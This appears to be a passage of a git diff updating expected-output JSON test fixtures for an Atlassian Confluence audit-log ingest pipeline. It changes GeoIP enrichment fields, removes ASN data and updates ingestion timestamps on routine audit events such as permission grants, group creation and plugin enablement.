"{\"timestamp\":\"2021-11-23T00:35:03.250Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16443,20 +15441,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -16464,7 +15456,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222696222Z", + "ingested": "2021-12-14T14:34:31.513274756Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.246Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SYSTEMADMINISTRATOR\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16534,20 +15526,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -16555,7 +15541,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222698119Z", + "ingested": "2021-12-14T14:34:31.513275143Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.243Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16625,20 +15611,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -16646,7 +15626,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222700018Z", + "ingested": "2021-12-14T14:34:31.513275542Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.241Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"ADMINISTRATECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16716,20 +15696,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -16737,7 +15711,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222701889Z", + "ingested": "2021-12-14T14:34:31.513275934Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.239Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16807,20 +15781,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -16828,7 +15796,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222703758Z", + "ingested": "2021-12-14T14:34:31.513276386Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.217Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16868,31 +15836,6 @@ } } }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.143", - "ip": "81.2.69.143" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-23T00:35:03.201Z", "ecs": { "version": "1.12.0" @@ -16908,9 +15851,25 @@ "service": { "address": "http://confluence.internal:8090" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.143", + "ip": "81.2.69.143" + }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-08T15:08:08.222705637Z", + "ingested": "2021-12-14T14:34:31.513276770Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.201Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -16925,6 +15884,9 @@ "full_name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "confluence-users", "id": "confluence-users" @@ -16950,31 +15912,6 @@ } } }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.143", - "ip": "81.2.69.143" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-23T00:35:03.188Z", "ecs": { "version": "1.12.0" @@ -16990,9 +15927,25 @@ "service": { "address": "http://confluence.internal:8090" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.143", + "ip": "81.2.69.143" + }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-08T15:08:08.222707507Z", + "ingested": "2021-12-14T14:34:31.513277166Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.188Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -17007,6 +15960,9 @@ "full_name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "confluence-administrators", "id": "confluence-administrators" @@ -17140,20 +16096,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -17161,7 +16111,7 @@ }, "event": { "action": "audit.logging.summary.directory.added", - "ingested": "2021-12-08T15:08:08.222709397Z", + "ingested": "2021-12-14T14:34:31.513277566Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.109Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.directory.added\",\"action\":\"User directory created\"},\"affectedObjects\":[{\"name\":\"Confluence Internal Directory\",\"type\":\"Directory\"}],\"changedValues\":[{\"key\":\"Active\",\"i18nKey\":\"Active\",\"to\":\"Yes\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_USER\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_USER_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_GROUP_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_ROLE_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_USER\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_USER\"},{\"key\":\"Description\",\"i18nKey\":\"Description\",\"to\":\"Confluence default internal directory\"},{\"key\":\"Encryption type\",\"i18nKey\":\"Encryption type\",\"to\":\"atlassian-security\"},{\"key\":\"ID\",\"i18nKey\":\"ID\",\"to\":\"327681\"},{\"key\":\"Name\",\"i18nKey\":\"Name\",\"to\":\"Confluence Internal Directory\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"INTERNAL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -17212,20 +16162,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -17233,7 +16177,7 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-08T15:08:08.222711266Z", + "ingested": "2021-12-14T14:34:31.513277975Z", "original": "{\"timestamp\":\"2021-11-23T00:34:46.735Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.import.export\",\"category\":\"Import/Export\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"action\":\"Space import\"},\"affectedObjects\":[{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -17282,20 +16226,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -17303,7 +16241,7 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-08T15:08:08.222713141Z", + "ingested": "2021-12-14T14:34:31.513278362Z", "original": "{\"timestamp\":\"2021-11-23T00:34:45.732Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.plugins\",\"category\":\"Apps\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"action\":\"App enabled\"},\"affectedObjects\":[{\"name\":\"Synchrony Interop Bootstrap Plugin\",\"type\":\"App\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -17352,20 +16290,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -17373,7 +16305,7 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-08T15:08:08.222715004Z", + "ingested": "2021-12-14T14:34:31.513278740Z", "original": "{\"timestamp\":\"2021-11-23T00:34:44.466Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.plugins\",\"category\":\"Apps\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"action\":\"App enabled\"},\"affectedObjects\":[{\"name\":\"Confluence Collaborative Editor Plugin\",\"type\":\"App\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -17440,7 +16372,7 @@ }, "event": { "action": "audit.logging.summary.user.renamed", - "ingested": "2021-12-08T15:08:08.222716897Z", + "ingested": "2021-12-14T14:34:31.513279180Z", "original": "{\"timestamp\":\"2021-11-28T17:05:37.142Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.renamed\",\"action\":\"User renamed\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"audit.logging.changed.value.username\",\"from\":\"asdf\",\"to\":\"asdf123\"}],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -17511,7 +16443,7 @@ }, "event": { "action": "audit.logging.summary.user.updated", - "ingested": "2021-12-08T15:08:08.222718799Z", + "ingested": "2021-12-14T14:34:31.513279584Z", "original": "{\"timestamp\":\"2021-11-28T17:06:11.805Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.updated\",\"action\":\"User details updated\"},\"affectedObjects\":[{\"name\":\"asdf asdfasdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -17589,7 +16521,7 @@ }, "event": { "action": "audit.logging.summary.user.updated", - "ingested": "2021-12-08T15:08:08.222720666Z", + "ingested": "2021-12-14T14:34:31.513279982Z", "original": "{\"timestamp\":\"2021-11-28T17:05:37.158Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.updated\",\"action\":\"User details updated\"},\"affectedObjects\":[{\"name\":\"asdf asdfasdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[{\"key\":\"Display name\",\"i18nKey\":\"Display name\",\"from\":\"asdf\",\"to\":\"asdf asdfasdf\"}],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index 36ebad2a710..8b63864a6b6 100644 --- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -38,20 +38,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -59,7 +53,7 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-08T15:09:09.045122167Z", + "ingested": "2021-12-14T14:34:52.859148619Z", "original": "{\"affectedObjects\":[{\"name\":\"Synchrony Interop Bootstrap Plugin\",\"type\":\"App\"}],\"auditType\":{\"action\":\"App enabled\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Apps\",\"categoryI18nKey\":\"audit.logging.category.plugins\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624567,\"nano\":332000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -110,20 +104,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -131,7 +119,7 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-08T15:09:09.045126258Z", + "ingested": "2021-12-14T14:34:52.859151088Z", "original": "{\"affectedObjects\":[{\"name\":\"Confluence Collaborative Editor Plugin\",\"type\":\"App\"}],\"auditType\":{\"action\":\"App enabled\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Apps\",\"categoryI18nKey\":\"audit.logging.category.plugins\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624565,\"nano\":791000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -183,20 +171,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -204,7 +186,7 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-08T15:09:09.045128082Z", + "ingested": "2021-12-14T14:34:52.859151561Z", "original": "{\"affectedObjects\":[{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space import\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Import/Export\",\"categoryI18nKey\":\"audit.logging.category.import.export\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624569,\"nano\":660000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -347,20 +329,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -368,7 +344,7 @@ }, "event": { "action": "audit.logging.summary.directory.added", - "ingested": "2021-12-08T15:09:09.045129817Z", + "ingested": "2021-12-14T14:34:52.859151950Z", "original": "{\"affectedObjects\":[{\"name\":\"Confluence Internal Directory\",\"type\":\"Directory\"}],\"auditType\":{\"action\":\"User directory created\",\"actionI18nKey\":\"audit.logging.summary.directory.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"ID\",\"key\":\"ID\",\"to\":\"327681\"},{\"i18nKey\":\"Name\",\"key\":\"Name\",\"to\":\"Confluence Internal Directory\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"},{\"i18nKey\":\"Encryption type\",\"key\":\"Encryption type\",\"to\":\"atlassian-security\"},{\"i18nKey\":\"Description\",\"key\":\"Description\",\"to\":\"Confluence default internal directory\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"INTERNAL\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed 